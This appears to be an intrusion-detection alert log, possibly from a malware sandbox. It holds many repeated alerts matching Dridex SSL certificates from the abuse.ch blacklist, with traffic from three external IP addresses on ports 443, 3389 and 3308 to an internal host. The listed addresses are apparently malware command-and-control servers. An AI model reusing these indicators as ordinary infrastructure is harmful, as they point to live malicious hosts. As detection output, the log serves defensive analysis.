01/12/21-07:44:12.362938	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49238	5.100.228.233	192.168.2.22
01/12/21-07:44:13.389674	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49240	77.220.64.37	192.168.2.22
01/12/21-07:44:13.904558	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49241	80.86.91.27	192.168.2.22
01/12/21-07:44:14.406142	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49242	5.100.228.233	192.168.2.22
01/12/21-07:44:14.406142	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49242	5.100.228.233	192.168.2.22
01/12/21-07:44:15.452432	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49244	77.220.64.37	192.168.2.22
01/12/21-07:44:15.956693	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49245	80.86.91.27	192.168.2.22
01/12/21-07:44:16.463563	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49246	5.100.228.233	192.168.2.22
01/12/21-07:44:16.463563	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49246	5.100.228.233	192.168.2.22
01/12/21-07:44:17.511456	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49248	77.220.64.37	192.168.2.22
01/12/21-07:44:18.027338	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49249	80.86.91.27	192.168.2.22
01/12/21-07:44:18.549889	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49250	5.100.228.233	192.168.2.22
01/12/21-07:44:18.549889	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49250	5.100.228.233	192.168.2.22
01/12/21-07:44:19.586059	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49252	77.220.64.37	192.168.2.22
01/12/21-07:44:20.108232	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49253	80.86.91.27	192.168.2.22
01/12/21-07:44:20.629742	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49254	5.100.228.233	192.168.2.22
01/12/21-07:44:20.629742	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49254	5.100.228.233	192.168.2.22
01/12/21-07:44:21.677203	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49256	77.220.64.37	192.168.2.22
01/12/21-07:44:22.204481	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49257	80.86.91.27	192.168.2.22
01/12/21-07:44:22.711412	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49258	5.100.228.233	192.168.2.22
01/12/21-07:44:22.711412	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49258	5.100.228.233	192.168.2.22
01/12/21-07:44:23.748642	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49260	77.220.64.37	192.168.2.22
01/12/21-07:44:24.260367	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49261	80.86.91.27	192.168.2.22
01/12/21-07:44:24.776557	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49262	5.100.228.233	192.168.2.22
01/12/21-07:44:24.776557	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49262	5.100.228.233	192.168.2.22
01/12/21-07:44:25.826719	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49264	77.220.64.37	192.168.2.22
01/12/21-07:44:26.350785	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49265	80.86.91.27	192.168.2.22
01/12/21-07:44:27.259582	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49266	5.100.228.233	192.168.2.22
01/12/21-07:44:27.259582	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49266	5.100.228.233	192.168.2.22
01/12/21-07:44:28.880371	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49268	77.220.64.37	192.168.2.22
01/12/21-07:44:29.406411	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49269	80.86.91.27	192.168.2.22
01/12/21-07:44:29.917421	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49270	5.100.228.233	192.168.2.22
01/12/21-07:44:29.917421	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49270	5.100.228.233	192.168.2.22
01/12/21-07:44:30.961345	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49272	77.220.64.37	192.168.2.22
01/12/21-07:44:31.482551	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49273	80.86.91.27	192.168.2.22
01/12/21-07:44:31.993012	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49274	5.100.228.233	192.168.2.22
01/12/21-07:44:31.993012	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49274	5.100.228.233	192.168.2.22
01/12/21-07:44:33.033416	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49276	77.220.64.37	192.168.2.22
01/12/21-07:44:33.562391	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49277	80.86.91.27	192.168.2.22
01/12/21-07:44:34.068398	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49278	5.100.228.233	192.168.2.22
01/12/21-07:44:34.068398	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49278	5.100.228.233	192.168.2.22
01/12/21-07:44:35.080436	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49280	77.220.64.37	192.168.2.22
01/12/21-07:44:35.582382	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49281	80.86.91.27	192.168.2.22
01/12/21-07:44:36.098738	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49282	5.100.228.233	192.168.2.22
01/12/21-07:44:36.098738	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49282	5.100.228.233	192.168.2.22
01/12/21-07:44:37.133030	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49284	77.220.64.37	192.168.2.22
01/12/21-07:44:37.647353	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49285	80.86.91.27	192.168.2.22
01/12/21-07:44:38.191268	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49286	5.100.228.233	192.168.2.22
01/12/21-07:44:38.191268	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49286	5.100.228.233	192.168.2.22
01/12/21-07:44:39.227731	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49288	77.220.64.37	192.168.2.22
01/12/21-07:44:39.759376	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49289	80.86.91.27	192.168.2.22
01/12/21-07:44:40.283765	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49290	5.100.228.233	192.168.2.22
01/12/21-07:44:40.283765	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49290	5.100.228.233	192.168.2.22
01/12/21-07:44:41.335612	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49292	77.220.64.37	192.168.2.22
01/12/21-07:44:41.859009	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49293	80.86.91.27	192.168.2.22
01/12/21-07:44:42.383117	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49294	5.100.228.233	192.168.2.22
01/12/21-07:44:42.383117	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49294	5.100.228.233	192.168.2.22
01/12/21-07:44:43.409327	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49296	77.220.64.37	192.168.2.22
01/12/21-07:44:43.939408	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49297	80.86.91.27	192.168.2.22
01/12/21-07:44:44.465253	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49298	5.100.228.233	192.168.2.22
01/12/21-07:44:44.465253	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49298	5.100.228.233	192.168.2.22
01/12/21-07:44:45.532657	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49300	77.220.64.37	192.168.2.22
01/12/21-07:44:46.055335	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49301	80.86.91.27	192.168.2.22
01/12/21-07:44:46.588990	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49302	5.100.228.233	192.168.2.22
01/12/21-07:44:46.588990	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49302	5.100.228.233	192.168.2.22
01/12/21-07:44:47.638114	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49304	77.220.64.37	192.168.2.22
01/12/21-07:44:48.162268	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49305	80.86.91.27	192.168.2.22
01/12/21-07:44:48.688061	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49306	5.100.228.233	192.168.2.22
01/12/21-07:44:48.688061	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49306	5.100.228.233	192.168.2.22
01/12/21-07:44:49.744573	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49308	77.220.64.37	192.168.2.22
01/12/21-07:44:50.268591	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49309	80.86.91.27	192.168.2.22
01/12/21-07:44:50.782405	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49310	5.100.228.233	192.168.2.22
01/12/21-07:44:50.782405	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49310	5.100.228.233	192.168.2.22
01/12/21-07:44:51.831463	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49312	77.220.64.37	192.168.2.22
01/12/21-07:44:52.360505	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49313	80.86.91.27	192.168.2.22
01/12/21-07:44:52.866561	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49314	5.100.228.233	192.168.2.22
01/12/21-07:44:52.866561	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49314	5.100.228.233	192.168.2.22
01/12/21-07:44:53.924521	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49316	77.220.64.37	192.168.2.22
01/12/21-07:44:54.448859	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49317	80.86.91.27	192.168.2.22
01/12/21-07:44:54.985880	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49318	5.100.228.233	192.168.2.22
01/12/21-07:44:54.985880	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49318	5.100.228.233	192.168.2.22
01/12/21-07:44:56.032154	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49320	77.220.64.37	192.168.2.22
01/12/21-07:44:56.583401	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49321	80.86.91.27	192.168.2.22
01/12/21-07:44:57.128393	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49322	5.100.228.233	192.168.2.22
01/12/21-07:44:57.128393	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49322	5.100.228.233	192.168.2.22
01/12/21-07:44:58.167417	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49324	77.220.64.37	192.168.2.22
01/12/21-07:44:58.691581	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49325	80.86.91.27	192.168.2.22
01/12/21-07:44:59.202332	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49326	5.100.228.233	192.168.2.22
01/12/21-07:44:59.202332	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49326	5.100.228.233	192.168.2.22
01/12/21-07:45:00.228245	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49328	77.220.64.37	192.168.2.22
01/12/21-07:45:00.732850	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49329	80.86.91.27	192.168.2.22
01/12/21-07:45:01.246663	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49330	5.100.228.233	192.168.2.22
01/12/21-07:45:01.246663	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49330	5.100.228.233	192.168.2.22
01/12/21-07:45:02.282642	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49332	77.220.64.37	192.168.2.22
01/12/21-07:45:02.796351	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49333	80.86.91.27	192.168.2.22
01/12/21-07:45:03.323912	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49334	5.100.228.233	192.168.2.22
01/12/21-07:45:03.323912	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49334	5.100.228.233	192.168.2.22
01/12/21-07:45:04.378952	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49336	77.220.64.37	192.168.2.22
01/12/21-07:45:04.965080	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49337	80.86.91.27	192.168.2.22
01/12/21-07:45:05.488500	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49338	5.100.228.233	192.168.2.22
01/12/21-07:45:05.488500	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49338	5.100.228.233	192.168.2.22
01/12/21-07:45:06.525912	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49340	77.220.64.37	192.168.2.22
01/12/21-07:45:07.059239	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49341	80.86.91.27	192.168.2.22
01/12/21-07:45:07.594874	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49342	5.100.228.233	192.168.2.22
01/12/21-07:45:07.594874	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49342	5.100.228.233	192.168.2.22
01/12/21-07:45:08.641508	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49344	77.220.64.37	192.168.2.22
01/12/21-07:45:09.145932	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49345	80.86.91.27	192.168.2.22
01/12/21-07:45:09.690643	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49346	5.100.228.233	192.168.2.22
01/12/21-07:45:09.690643	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49346	5.100.228.233	192.168.2.22
01/12/21-07:45:10.758306	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49348	77.220.64.37	192.168.2.22
01/12/21-07:45:11.267275	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49349	80.86.91.27	192.168.2.22
01/12/21-07:45:11.807918	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49350	5.100.228.233	192.168.2.22
01/12/21-07:45:11.807918	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49350	5.100.228.233	192.168.2.22
01/12/21-07:45:12.865269	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49352	77.220.64.37	192.168.2.22
01/12/21-07:45:13.383691	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49353	80.86.91.27	192.168.2.22
01/12/21-07:45:13.901860	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49354	5.100.228.233	192.168.2.22
01/12/21-07:45:13.901860	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49354	5.100.228.233	192.168.2.22
01/12/21-07:45:14.940089	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49356	77.220.64.37	192.168.2.22
01/12/21-07:45:15.479065	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49357	80.86.91.27	192.168.2.22
01/12/21-07:45:16.002150	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49358	5.100.228.233	192.168.2.22
01/12/21-07:45:16.002150	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49358	5.100.228.233	192.168.2.22
01/12/21-07:45:17.049262	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49360	77.220.64.37	192.168.2.22
01/12/21-07:45:17.574252	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49361	80.86.91.27	192.168.2.22
01/12/21-07:45:18.094642	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49362	5.100.228.233	192.168.2.22
01/12/21-07:45:18.094642	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49362	5.100.228.233	192.168.2.22
01/12/21-07:45:19.138650	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49364	77.220.64.37	192.168.2.22
01/12/21-07:45:19.661561	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49365	80.86.91.27	192.168.2.22
01/12/21-07:45:20.210853	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49366	5.100.228.233	192.168.2.22
01/12/21-07:45:20.210853	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49366	5.100.228.233	192.168.2.22
01/12/21-07:45:21.244669	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49368	77.220.64.37	192.168.2.22
01/12/21-07:45:21.771560	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49369	80.86.91.27	192.168.2.22
01/12/21-07:45:22.318126	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49370	5.100.228.233	192.168.2.22
01/12/21-07:45:22.318126	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49370	5.100.228.233	192.168.2.22
01/12/21-07:45:23.379293	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49372	77.220.64.37	192.168.2.22
01/12/21-07:45:23.946645	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49373	80.86.91.27	192.168.2.22
01/12/21-07:45:24.534297	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49374	5.100.228.233	192.168.2.22
01/12/21-07:45:24.534297	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49374	5.100.228.233	192.168.2.22
01/12/21-07:45:25.655994	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49376	77.220.64.37	192.168.2.22
01/12/21-07:45:26.164890	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49377	80.86.91.27	192.168.2.22
01/12/21-07:45:26.685547	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49378	5.100.228.233	192.168.2.22
01/12/21-07:45:26.685547	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49378	5.100.228.233	192.168.2.22
01/12/21-07:45:27.717140	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49380	77.220.64.37	192.168.2.22
01/12/21-07:45:28.250041	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49381	80.86.91.27	192.168.2.22
01/12/21-07:45:28.776439	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49382	5.100.228.233	192.168.2.22
01/12/21-07:45:28.776439	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49382	5.100.228.233	192.168.2.22
01/12/21-07:45:30.254416	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49384	77.220.64.37	192.168.2.22
01/12/21-07:45:30.799057	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49385	80.86.91.27	192.168.2.22
01/12/21-07:45:31.325609	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49386	5.100.228.233	192.168.2.22
01/12/21-07:45:31.325609	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49386	5.100.228.233	192.168.2.22
01/12/21-07:45:32.367144	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49388	77.220.64.37	192.168.2.22
01/12/21-07:45:32.896746	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49389	80.86.91.27	192.168.2.22
01/12/21-07:45:33.437031	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49390	5.100.228.233	192.168.2.22
01/12/21-07:45:33.437031	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49390	5.100.228.233	192.168.2.22
01/12/21-07:45:34.489134	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49392	77.220.64.37	192.168.2.22
01/12/21-07:45:35.019822	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49393	80.86.91.27	192.168.2.22
01/12/21-07:45:35.553464	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49394	5.100.228.233	192.168.2.22
01/12/21-07:45:35.553464	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49394	5.100.228.233	192.168.2.22
01/12/21-07:45:36.308810	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49396	77.220.64.37	192.168.2.22
01/12/21-07:45:36.842305	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49397	80.86.91.27	192.168.2.22
01/12/21-07:45:37.392102	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49398	5.100.228.233	192.168.2.22
01/12/21-07:45:37.392102	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49398	5.100.228.233	192.168.2.22
01/12/21-07:45:38.451756	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49400	77.220.64.37	192.168.2.22
01/12/21-07:45:38.957005	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49401	80.86.91.27	192.168.2.22
01/12/21-07:45:39.484599	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49402	5.100.228.233	192.168.2.22
01/12/21-07:45:39.484599	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49402	5.100.228.233	192.168.2.22
01/12/21-07:45:40.549096	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49404	77.220.64.37	192.168.2.22
01/12/21-07:45:41.074283	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49405	80.86.91.27	192.168.2.22
01/12/21-07:45:41.617666	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49406	5.100.228.233	192.168.2.22
01/12/21-07:45:41.617666	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49406	5.100.228.233	192.168.2.22
01/12/21-07:45:42.692789	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49408	77.220.64.37	192.168.2.22
01/12/21-07:45:43.214602	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49409	80.86.91.27	192.168.2.22
01/12/21-07:45:43.737164	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49410	5.100.228.233	192.168.2.22
